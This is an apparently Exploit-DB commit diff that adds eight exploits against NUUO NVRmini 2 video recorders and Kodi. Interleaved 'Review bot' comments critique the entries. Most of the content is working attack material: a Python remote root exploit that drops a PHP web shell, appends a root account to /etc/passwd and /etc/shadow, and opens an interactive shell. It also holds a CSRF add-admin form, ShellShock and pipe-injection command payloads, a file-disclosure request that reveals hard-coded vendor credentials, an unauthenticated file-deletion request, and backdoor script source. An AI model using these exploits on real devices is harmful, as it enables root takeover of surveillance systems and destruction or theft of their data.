DB: 2016-08-07

8 new exploits

Kodi Web Server 16.1 - Denial of Service
NUUO NVRmini 2 3.0.8 - Remote Root Exploit
NUUO NVRmini 2 3.0.8 - (Add Admin) CSRF
NUUO NVRmini 2 3.0.8 - Local File Disclosure
NUUO NVRmini 2 3.0.8 - Multiple OS Command Injection
NUUO NVRmini 2 3.0.8 - ShellShock Remote Code Execution
NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion
NUUO NVRmini 2 3.0.8 - (strong_user.php) Backdoor Remote Shell Access
Offensive Security 2016-08-07 05:06:35 +00:00
parent 428f25fc1c
commit e161127711
9 changed files with 1125 additions and 0 deletions


@ -36356,3 +36356,11 @@ id,file,description,date,author,platform,type,port
40205,platforms/cgi/webapps/40205.txt,"Davolink DV-2051 - Multiple Vulnerabilities",2016-08-05,"Eric Flokstra",cgi,webapps,80
40206,platforms/php/webapps/40206.txt,"WordPress Count per Day Plugin 3.5.4 - Stored Cross-Site Scripting",2016-08-05,"Julien Rentrop",php,webapps,80
40207,platforms/hardware/webapps/40207.txt,"NASdeluxe NDL-2400r 2.01.09 - OS Command Injection",2016-08-05,"SySS GmbH",hardware,webapps,80
40208,platforms/windows/dos/40208.py,"Kodi Web Server 16.1 - Denial of Service",2016-08-05,"Guillaume Kaddouch",windows,dos,8080
40209,platforms/php/webapps/40209.py,"NUUO NVRmini 2 3.0.8 - Remote Root Exploit",2016-08-06,LiquidWorm,php,webapps,80
40210,platforms/php/webapps/40210.html,"NUUO NVRmini 2 3.0.8 - (Add Admin) CSRF",2016-08-06,LiquidWorm,php,webapps,80
40211,platforms/php/webapps/40211.txt,"NUUO NVRmini 2 3.0.8 - Local File Disclosure",2016-08-06,LiquidWorm,php,webapps,80
40212,platforms/php/webapps/40212.txt,"NUUO NVRmini 2 3.0.8 - Multiple OS Command Injection",2016-08-06,LiquidWorm,php,webapps,80
40213,platforms/cgi/webapps/40213.txt,"NUUO NVRmini 2 3.0.8 - ShellShock Remote Code Execution",2016-08-06,LiquidWorm,cgi,webapps,80
40214,platforms/php/webapps/40214.txt,"NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion",2016-08-06,LiquidWorm,php,webapps,80
40215,platforms/php/webapps/40215.txt,"NUUO NVRmini 2 3.0.8 - (strong_user.php) Backdoor Remote Shell Access",2016-08-06,LiquidWorm,php,webapps,80
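Review bot: the date column for 40208 (2016-08-05) disagrees with that exploit's own header, which gives `Date: 06/08/2016` and `2016-08-06: Exploit published.`; pick one and use it in both places. The title `NUUO NVRmini 2 3.0.8 - ShellShock Remote Code Execution` for 40213 also does not match the advisory it points at, whose header scopes the finding to the NE-4160 at `Firmware Version: 02.02.00` / `NVR Version: 02.02.0000.0040` rather than to 3.0.8; the index title should carry the version the advisory actually tested.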

platforms/cgi/webapps/40213.txt Executable file

@ -0,0 +1,91 @@
NUUO NVRmini 2 NE-4160 ShellShock Remote Code Execution
Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: Firmware Version: 02.02.00
NVR Version: 02.02.0000.0040
Device Pack Version: 04.07.0000.0030
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.
Desc: NUUO NVRmini, NVRmini2, Crystal, NVRSolo suffers from authenticated ShellShock
vulnerability. This could allow an attacker to gain control over a targeted computer
if exploited successfully. The vulnerability affects Bash, a common component known
as a shell that appears in many versions of Linux and Unix.
Tested on: GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
PHP/5.5.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5352
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5352.php
14.01.2016
--
POST /cgi-bin/cgi_system HTTP/1.1
Host: 10.0.0.17
Content-Length: 91
Origin: http://10.0.0.17
X-Requested-With: XMLHttpRequest
User-Agent: () { :;}; /bin/ls -al
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: http://10.0.0.17/protocol_ftp.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=3bc601000ea8f085c22cb37b9b102b7f; lang=en
Connection: close
cmd=ftp_setup&act=modify&com_port=21&pasv_port_from=1024&pasv_port_to=65535&services=enable
Response:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 15 Jan 2016 13:09:11 GMT
Server: lighttpd/1.4.28
Content-Length: 1652
drwxr-xr-x 3 root root 402 Oct 20 2014 .
drwxr-xr-x 6 root root 1024 Jan 4 22:49 ..
-rwxr-xr-x 1 root root 256564 Oct 20 2014 DaylightSavingWatcher
-rwxr-xr-x 1 root root 51376 Oct 20 2014 NuDatTool
-rwxr-xr-x 1 root root 60500 Oct 20 2014 NuDiscovery
-rwxr-xr-x 1 root root 930652 Oct 20 2014 NuHWMgn
-rwxr-xr-x 1 root root 8236 Oct 20 2014 NuNICWatcher
-rwxr-xr-x 1 root root 309 Oct 20 2014 after_mount.sh
lrwxrwxrwx 1 root root 7 Oct 20 2014 archive_mrg_mv -> lite_mv
-rwxr-xr-x 1 root root 1114844 Oct 20 2014 auto_upgrade
lrwxrwxrwx 1 root root 7 Oct 20 2014 cgi_main -> lite_mv
-rwxr-xr-x 1 root root 576992 Oct 20 2014 cgi_system
lrwxrwxrwx 1 root root 7 Oct 20 2014 ddns_update -> lite_mv
-rwxr-xr-x 1 root root 570 Oct 20 2014 getdhcpip.sh
-rwxr-xr-x 1 root root 388 Oct 20 2014 halt
drwxr-xr-x 2 root root 41 Oct 20 2014 lib
-rwxr-xr-x 1 root root 3827188 Oct 20 2014 lite_mv
-rwxr-xr-x 1 root root 15396 Oct 20 2014 nagent_mv
-rwxr-xr-x 1 root root 9836 Oct 20 2014 nu_btns
-rwxr-xr-x 1 root root 3496 Oct 20 2014 nudaemon
-rwxr-xr-x 1 root root 10616 Oct 20 2014 nufancontrol
-rwxr-xr-x 1 root root 12772 Oct 20 2014 nuklogd
-rwxr-xr-x 1 root root 392 Oct 20 2014 reboot
-rwxr-xr-x 1 root root 13144 Oct 20 2014 thwstat
FTP Setup OK
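Review bot: the header lists affected versions but gives no fix or mitigation, even though this is plain ShellShock reached through the cgi_system CGI; add a line after `Affected version:` stating that a firmware shipping the hardened Bash (function-import fix) closes it, since the vendor version strings alone do not tell an operator whether a device is exposed. The response is the informative part of the PoC and deserves a sentence: the `ls -al` listing arrives before `FTP Setup OK`, which shows cgi_system spawns a shell that imports the request environment before doing its own work, so detection should match the `() {` function-definition prefix in any request header reaching /cgi-bin, not only the User-Agent on this one `cmd=ftp_setup` call. The text says "authenticated" but the only evidence is the `Cookie: PHPSESSID=...` line; say explicitly that a valid session is required.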

platforms/php/webapps/40209.py Executable file

@ -0,0 +1,163 @@
#!/usr/bin/env python
#
#
# NUUO Remote Root Exploit
#
#
# Vendor: NUUO Inc.
# Product web page: http://www.nuuo.com
# Affected version: <=3.0.8
#
# Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
# functionality. Setup is simple and easy, with automatic port forwarding
# settings built in. NVRmini 2 supports POS integration, making this the perfect
# solution for small retail chain stores. NVRmini 2 also comes full equipped as
# a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
# and RAID functions for data protection. Choose NVR and know that your valuable video
# data is safe, always.
#
# Desc: NUUO NVRmini, NVRmini2, Crystal and NVRSolo suffers from an unauthenticated command
# injection vulnerability. Due to an undocumented and hidden debugging script, an attacker
# can inject and execute arbitrary code as the root user via the 'log' GET parameter in the
# '__debugging_center_utils___.php' script.
#
# -----------------------------------------------------
# $ nuuo.py 10.0.0.17 80
# [*] ==============================================
# [*] NUUO NVR/DVR/NDVR Remote Root Exploit
# [*] Zero Science Lab - http://www.zeroscience.mk
# [*] ==============================================
# [*] Backdoor detected!
# [*] Add root user (y/n)? n
# [*] Press [ ENTER ] to start root shell...
#
# root@nuuo:~# id
# uid=0(root) gid=0(root)
#
# root@nuuo:~# exit
#
# [*] Removing raidh.php file
# [*] Session terminated!
#
# $
# -----------------------------------------------------
#
# Tested on: GNU/Linux 3.0.8 (armv7l)
# GNU/Linux 2.6.31.8 (armv5tel)
# lighttpd/1.4.28
# PHP/5.5.3
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Zero Science Lab - http://www.zeroscience.mk
#
#
# Advisory ID: ZSL-2016-5348
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5348.php
# NSE Script: http://www.zeroscience.mk/codes/nuuo-backdoor.nse
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40209.zip
#
#
# 14.01.2016
#
import os######
import sys#####
import time####
import urllib##
import binascii
import requests
__author__ = 'lqwrm'
def persist(host,port,hexy,clean):
pwd = '''echo 'roOt:x:0:0:PWNED account:/:/bin/bash' >> /etc/passwd'''
sdw = '''echo 'roOt:$1$MJOnV/Y3$tDnMIBMy0lEQ2kDpfgTJP0:16914:0:99999:7:::' >> /etc/shadow'''
print '[*] Adding user \'roOt\' with password \'rewt\' in passwd file.'
requests.get('http://'+host+':'+port+'/raidh.php?cmd='+pwd)
time.sleep(2)
print '[*] Updating shadow file.'
requests.get('http://'+host+':'+port+'/raidh.php?cmd='+sdw)
time.sleep(2)
print '[*] Shell awaits: ssh roOt@'+host
requests.get('http://'+host+':'+port+'/raidh.php?cmd='+urllib.quote(clean))
exit(0)
def check(host,port,hexy):
try:
r = requests.get('http://'+host+':'+port+'/'+hexy, allow_redirects=False)
if r.status_code == 200:
print '[*] Backdoor detected!'
pass
else:
print '[*] No backdoors here. :('
exit(0)
except Exception:
print '[*] Could not connect.'
exit(0)
def main():
print '[*] =============================================='
print '[*] NUUO NVR/DVR/NDVR Remote Root Exploit'
print '[*] Zero Science Lab - http://www.zeroscience.mk'
print '[*] =============================================='
if (len(sys.argv) <= 2):
print '[*] Usage: nuuo.py <ipaddress> <port>'
exit(0)
host = sys.argv[1]
port = sys.argv[2]
dbgcu = '5f5f64'#
dbgcu+= '656275'#
dbgcu+= '676769'#
dbgcu+= '6e675f'#
dbgcu+= '63656e'#
dbgcu+= '746572'#
dbgcu+= '5f7574'#
dbgcu+= '696c73'#
dbgcu+= '5f5f5f'#
dbgcu+= '2e7068'#
dbgcu+= '70'###'#
hexy = binascii.unhexlify(dbgcu)
check (host,port,hexy)
payload = '''echo "<?php system(\$_REQUEST[\'cmd\']); ?>" > raidh.php'''
requests.get('http://'+host+':'+port+'/'+hexy+'?log=1337;' + payload)
clean = 'rm raidh.php'
a1 = raw_input('[*] Add root user (y/n)? ')
if a1.strip() == 'y' or a1.strip() == 'Y':
persist (host,port,hexy,clean)
else:
pass
print '[*] Press [ ENTER ] to start root shell...'
raw_input()
while True:
try:
cmd = raw_input('root@nuuo:~# ')
if cmd.strip() == '':
print '[*] Give me a command!\n'
continue
else:
e = requests.get('http://'+host+':'+port+'/raidh.php?cmd='+urllib.quote(cmd))
print e.text
if cmd.strip() == 'exit':
print '[*] Removing raidh.php file'
requests.get('http://'+host+':'+port+'/raidh.php?cmd='+urllib.quote(clean))
print '[*] Session terminated!'
break
except Exception:
break
if __name__ == "__main__":
main()
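Review bot: the shell loop's `except Exception: break` at the end of main() skips the cleanup, so on any connection error the dropped `raidh.php` web shell stays on the device and only the `exit` path removes it; move the `rm raidh.php` request into a `finally:` and give every `requests.get` a `timeout=` so the loop reaches that handler instead of hanging. `check()` treats any HTTP 200 as `Backdoor detected!`, which gives a false positive on devices that answer unknown paths with a 200 landing page; compare against a known-absent path or the body. `import os` and the `hexy` argument of `persist()` are unused, and the script is Python 2 only (`print` statements, `raw_input`, `urllib.quote`), which the header should say. For responders the artifacts this leaves behind are worth listing in the header: `raidh.php` in the web root, a second uid-0 account `roOt` in /etc/passwd and /etc/shadow when the persist option is chosen, and GET requests for `__debugging_center_utils___.php?log=` in the lighttpd access log.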


@ -0,0 +1,66 @@
<!--
NUUO CSRF Add Admin Exploit
Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8 (NE-4160, NT-4040)
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.
Desc: The application interface allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests. This can be
exploited to perform certain actions with administrative privileges if a logged-in
user visits a malicious web site.
Tested on: GNU/Linux 3.0.8 (armv7l)
GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
PHP/5.5.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5349
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5349.php
14.01.2016
-->
<!-- 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 -->
<html>
<body>
<form action="http://10.0.0.17/users_xml.php">
<input type="hidden" name="&#95;password2" value="admin" />
<input type="hidden" name="addusername" value="csrfadmin" />
<input type="hidden" name="password" value="admin" />
<input type="hidden" name="cmd" value="adduser" />
<input type="hidden" name="group" value="poweruser" />
<input type="hidden" name="displaygroup" value="power&#32;user" />
<input type="hidden" name="magic" value="574" />
<input type="hidden" name="liveacc" value="1&#44;2&#44;3&#44;4&#44;5&#44;6&#44;7&#44;8&#44;9&#44;10&#44;11&#44;12&#44;13&#44;14&#44;15&#44;16" />
<input type="hidden" name="pbacc" value="1&#44;2&#44;3&#44;4&#44;5&#44;6&#44;7&#44;8&#44;9&#44;10&#44;11&#44;12&#44;13&#44;14&#44;15&#44;16" />
<input type="hidden" name="ptzacc" value="1" />
<input type="hidden" name="ioacc" value="1" />
<input type="hidden" name="backupacc" value="1" />
<input type="hidden" name="deleteacc" value="1" />
<input type="hidden" name="emapeacc" value="1" />
<input type="hidden" name="remotalkacc" value="1" />
<input type="hidden" name="logacc" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
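Review bot: the form has no `method` attribute, so this PoC submits `cmd=adduser` to users_xml.php with GET; the advisory should say whether the endpoint also accepts POST, because the fix is not "reject GET" but a per-session token validated server-side. The hidden `magic` field is a constant `574` here, so whatever it is, it is not a per-request nonce; one sentence on what `magic` is would stop readers assuming the device already has CSRF protection. The `<!-- 1,2,3,...,16 -->` comment is a leftover from building the `liveacc`/`pbacc` values and can go.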

platforms/php/webapps/40211.txt Executable file

@ -0,0 +1,154 @@
NUUO Local File Disclosure Vulnerability
Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8 (NE-4160, NT-4040)
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.
Desc: NUUO NVRmini, NVRmini2, Crystal and NVRSolo suffers from a file disclosure
vulnerability when input passed thru the 'css' parameter to 'css_parser.php' script
is not properly verified before being used to include files. This can be exploited
to disclose contents of files from local resources.
Tested on: GNU/Linux 3.0.8 (armv7l)
GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
PHP/5.5.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5350
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5350.php
14.01.2016
--
Request:
--------
GET http://10.0.0.17/css_parser.php?css=__nvr_dat_tool___.php HTTP/1.1
Response:
---------
<?php
include('utils.php');
header("Expires: Thu, 19 Nov 1981 08:52:00 GMT");
header("Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0");
header("Pragma: no-cache");
session_start();
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>DatTool</title>
</head>
<body>
<?php
if (isset($_POST) && isset($_POST['username']) && isset($_POST['password']))
{
if ($_POST['username'] != 'nuuoeng' || $_POST['password'] != 'qwe23622260')
{
exit(0);
}
if (isset($_POST['act']) && $_POST['act'] == 'checkdat')
{
echo '<script language="javascript">';
echo 'alert("The system will start to repair videos right after system reboot. Please go to Setting Page to reboot system manually.")';
echo '</script>';
touch(constant("FLASH_FOLDER")."/checkdat");
}
?>
<p>Click the Repair button to repair the recorded videos became black due to incorrect video format. It may take a long time to repair videos, which depends on the amount of video files.</p>
<form method="POST" action="<?php echo $_SERVER['PHP_SELF']; ?>" name="form0">
<input type="hidden" name="username" value="<?php echo $_POST['username']; ?>">
<input type="hidden" name="password" value="<?php echo htmlspecialchars( $_POST['password'] ); ?>">
<input type="hidden" name="act" value="checkdat">
<input type="submit" value="Repair" name="submit" >
</form>
<?php
}
else
{
?>
<form method="POST" action="<?php echo $_SERVER['PHP_SELF']; ?>" name="form0">
Usermame: <input type="text" size="15" name="username" value=""><br />
Password: <input type="password" size="15" name="password" value=""><br />
<input type="submit" value="Submit" name="submit" >
</form>
<?php
}
?>
</body>
</html>
============================================================================
Request:
--------
GET http://10.0.0.17/css_parser.php?css=css_parser.php HTTP/1.1
Response:
---------
<?php
if(!isset($_GET['css']))exit('/* please supply a "css" parameter */');
$filename=$_GET['css'];
if(strpos($filename,'..')!==false)exit('/* please use an absolute address for your css */');
$filename=$_SERVER['DOCUMENT_ROOT'].'/'.$filename;
if(!file_exists($filename))exit('/* referred css file does not exist */');
header('content-type:text/css');
header("Expires: ".gmdate("D, d M Y H:i:s", (time()+900)) . " GMT");
$matches=array();
$names=array();
$values=array();
$file=file_get_contents($filename);
foreach ($_GET as $key=>$value)
{
//echo "Key: $key; Value: $value <br/>\n ";
if ($key != 'css')
{
$file = str_replace($key,$value,$file);
}
//system("echo \"Key: $key; Value: $value <br/>\n \" >> $filename");
}
echo $file;
/*
foreach(array_reverse($matches[0]) as $match){
$match=preg_replace('/\s+/',' ',rtrim(ltrim($match)));
$names[]=preg_replace('/\s.*//*','',$match);
$values[]=preg_replace('/^[^\s]*\s/','',$match);
}
*/
?>
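Review bot: the Desc says the `css` value is "used to include files", but the disclosed css_parser.php source reads it with `file_get_contents` and echoes it, so this is read-only disclosure of anything under `$_SERVER['DOCUMENT_ROOT']`, not inclusion or execution; the only filter is `if(strpos($filename,'..')!==false)`, and the script never checks a session. Tighten the wording, since the fix differs: authentication, plus a whitelist of .css names or a realpath check against the one stylesheet directory. Two things the disclosed files show that the advisory does not mention: the `foreach ($_GET as $key=>$value)` loop with `str_replace($key,$value,$file)` lets any extra query parameter rewrite substrings of the returned file, and `__nvr_dat_tool___.php` ships a hard-coded credential pair (`nuuoeng` / `qwe23622260`) and echoes `$_POST['username']` unescaped into a hidden field while only the password next to it goes through `htmlspecialchars`. Each deserves its own line under Desc.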

platforms/php/webapps/40212.txt Executable file

@ -0,0 +1,127 @@
NUUO Multiple OS Command Injection Vulnerabilities
Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8 (NE-4160, NT-4040, NT-4040(R))
DP: <=04.07.0000.0030, <=04.03.0000.0035
FW: <=02.02.00, <=1.7.0
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.
NUUO Titan NVR is NUUO's Linux-based open platform recording solution. It is built
on Linux Foundation, with cross-platform Windows and MAC client software. It supports
up to 64 channels of megapixel recording with 250 Mbps throughput. It also comes with
a myriads of features that will sure to fulfill even the most demanding projects. Supports
over 2300 camera models from over 100 vendors.
Desc: NUUO NVRmini, NVRmini2, Crystal, NVRSolo and NVRTitan suffers from multiple
authenticated OS command injection vulnerabilities. This can be exploited to inject
and execute arbitrary shell commands as the root user.
Tested on: GNU/Linux 3.0.8 (armv7l)
GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
lighttpd/1.4.35
PHP/5.5.3
PHP/5.6.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5351
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5351.php
14.01.2016
--
NVRTitan:
POST /handle_iscsi.php HTTP/1.1
Host: 10.0.0.17
Content-Length: x
Origin: http://10.0.0.17
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: http://10.0.0.17/iscsi.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=c9fdced9e8129eb4c14e3154cd0e0ce3; lang=en; loginName=admin
Connection: close
act=discover&address=1.1.1.1|echo%20pwn&port=3260
HTTP/1.1 200 OK
X-Powered-By: PHP/5.6.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html; charset=UTF-8
Connection: close
Date: Mon, 18 Apr 2016 08:52:17 GMT
Server: lighttpd/1.4.35
Content-Length: x
pwn
============================================================
NVRmini/2/Solo/Crystal:
GET /cgi-bin/cgi_system?cmd=raid_setup&act=getsmartinfo&devname=|ping%20-n%200%20localhost&rand=1452765315144 HTTP/1.1
Host: 10.0.0.17
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
X-Requested-With: XMLHttpRequest
Accept: */*
Referer: http://10.0.0.17/raid.php
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=3bc601000ea8f085c22cb37b9b102b7f; lang=en
Connection: close
---
POST /cgi-bin/cgi_system?cmd=saveconfig HTTP/1.1
Host: 10.0.0.17
Content-Length: 97
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://10.0.0.17
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://10.0.0.17/save_config.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=3bc601000ea8f085c22cb37b9b102b7f; lang=en
Connection: close
bfolder=%2Fmtd%2Fblock3&bfile=|ping%20-n%200%20localhost&inc_emap=no&inc_pos=no
---
Sample session from commix:
Shell > whoami
root
Shell > ls
Default.ini EMap PatrolOpt003.xml PatrolOpt009.xml PatrolOpt015.xml access apcupsd authority.lic auto_upgrade.ini autoarchive.ini camera.ini cameraparam.ini cmsserver.ini cmsstat daylightsaving.ini ddns.ini dualstreaming.ini email.ini eventaction.ini ezNUUO iobox.ini lenssetting.ini lighttpd-inc.conf lighttpd.conf liveserver.ini notice.ini nuservice.conf pos proftpd-inc.conf pushnotification raid_info.xml recordingmode.ini schedule.ini scheduler_dio.ini scheduler_motion.ini smb-inc.conf version.xml
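Review bot: the two NVRmini/2/Solo/Crystal requests (`devname=|ping...` on `cgi_system?cmd=raid_setup` and `bfile=|ping...` on `cmd=saveconfig`) come with no response, so the only evidence for that product line is the commix session at the end; attach at least one raw response as was done for the NVRTitan handle_iscsi.php case. `Content-Length: x` in the Titan request and response is a placeholder and should carry the real values. The commix `whoami` returning `root` is the point to add to Desc for both lines: the code handling `address`, `devname` and `bfile` runs as root and hands them to a shell unescaped, so beyond the vendor patch the remediation is escapeshellarg or argument arrays for the spawned command and a non-root account for the web stack; for detection, `|` or `;` inside those three parameters in the lighttpd access log is the signature.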

platforms/php/webapps/40214.txt Executable file

@ -0,0 +1,67 @@

NUUO Arbitrary File Deletion Vulnerability
Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.
Desc: Input passed to the 'filename' parameter in 'deletefile.php' is not properly
sanitised before being used to delete files. This can be exploited to delete files
with the permissions of the web server using their absolute path or via directory
traversal sequences passed within the affected POST/GET parameter.
==================================================================
/deletefile.php:
----------------
1: <?php
2: $filename=$_POST['filename'];
3: unlink($filename);
4: if (file_exists($filename))
5: echo "fail";
6: else echo "true";
7: ?>
==================================================================
Tested on: GNU/Linux 3.0.8 (armv7l)
GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
PHP/5.5.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5353
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5353.php
14.01.2016
--
POST /deletefile.php HTTP/1.1
Host: 10.0.0.17
Content-Length: x
Origin: http://10.0.0.17
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close
filename=He_molested_murdered_and_mutilated_her.mp4
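Review bot: Desc says "POST/GET parameter" but the seven lines of deletefile.php read `$_POST['filename']` only, and it says deletion runs "with the permissions of the web server" while the commix session in 40212 shows the same web stack running as root, so the practical scope is any file on the device; align the text with the code. Those lines also contain no `session_start()` or authentication check, so the advisory should say plainly that this is unauthenticated, and the fix is more than sanitisation: the endpoint needs a session check and a realpath test that the target lies under the one directory it is meant to manage before `unlink` runs (the `file_exists` test after `unlink` only reports the outcome).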

platforms/php/webapps/40215.txt Executable file

@ -0,0 +1,395 @@

NUUO Backdoor (strong_user.php) Remote Shell Access
Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8 (NE-4160, NT-4040)
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.
Desc: NUUO NVRmini, NVRmini2, Crystal and NVRSolo devices have a hidden PHP script
that when called, a backdoor user is created with poweruser privileges that is able
to read and write files on the affected device. The backdoor user 'bbb' when created
with the password '111111' by visiting 'strong_user.php' script is able to initiate a
secure shell session and further steal and/or destroy sensitive information.
==================================================================
/strong_user.php:
-------------------------------
<?php
class ReadPasswd{
private $file;
private $fileData;
private $error;
function __construct($file) {
try{
if (is_file($file))
{
$this->fileData = file($file);
$this->file = $file;
}
else
{
throw new Exception("Couldnt open file.");
}
} catch (Exception $e) {
$this->error[] = $e->getMessage();
}
}
public function getAllHTML(){
foreach ($this->fileData as $content)
{
$temp = explode(':', $content);
$output .= "<b>Username: {$temp[0]} </b><br />";
$output .= "Validation: {$temp[1]} <br />";
$output .= "User Identifier: {$temp[2]} <br />";
$output .= "Group Identifier: {$temp[3]} <br />";
$output .= "Gecos Field: {$temp[4]} <br />";
$output .= "Home Directory: {$temp[5]} <br />";
$output .= "Shell: {$temp[6]} <br />";
$output .= "<br />";
}
return $output;
}
public function getAllCLI() {
foreach ($this->fileData as $content)
{
$temp = explode(':', $content);
$output .= "Username: {$temp[0]} n";
$output .= "Validation: {$temp[1]} n";
$output .= "User Identifier: {$temp[2]} n";
$output .= "Group Identifier: {$temp[3]} n";
$output .= "Gecos Field: {$temp[4]} n";
$output .= "Home Directory: {$temp[5]} n";
$output .= "Shell: {$temp[6]} n";
$output .= "n";
}
return $output;
}
public function searchUser($user,$data=0) {
try{
$data = array();
if (is_string($user))
{
foreach($this->fileData as $line)
{
$temp = explode(':', $line);
if (in_array($user,$temp))
{
if ($data) return 1;
$data['username'] = $temp[0];
$data['validation'] = $temp[1];
$data['user_identifier'] = $temp[2];
$data['group_identifier'] = $temp[3];
$data['gecos'] = $temp[4];
$data['home_directory'] = $temp[5];
$data['shell'] = $temp[6];
}
}
}
else
{
throw new Exception('A search error has occured.');
}
} catch (Exception $e) {
$this->error[] = $e->getMessage();
}
return $data;
}
public function getError() {
return $this->error;
}
public function deleteUser($user) {
try{
if ($this->searchUser($user,1))
{
foreach ($this->fileData as $line)
{
$lines = explode(":",$line);
if (!in_array($user,$lines))
{
$final .= $line;
}
}
if(!file_put_contents($this->file,$final))
{
throw new Exception("Could not delete user.");
}
}
else
{
throw new Exception("User doesnt exist.");
}
} catch (Exception $e) {
echo $this->error[] = $e->getMessage();
}
}
}
/*
echo "Strong test ";
ma_getuser();
ma_getgroup();
$result = array('users' => array(), 'groups' => array());
echo "<br>";
echo $maUser;
echo "<br>";
echo $maGroup;
echo "<br>";
foreach($maGroup as $key =>$value)
{
$tmp = array();
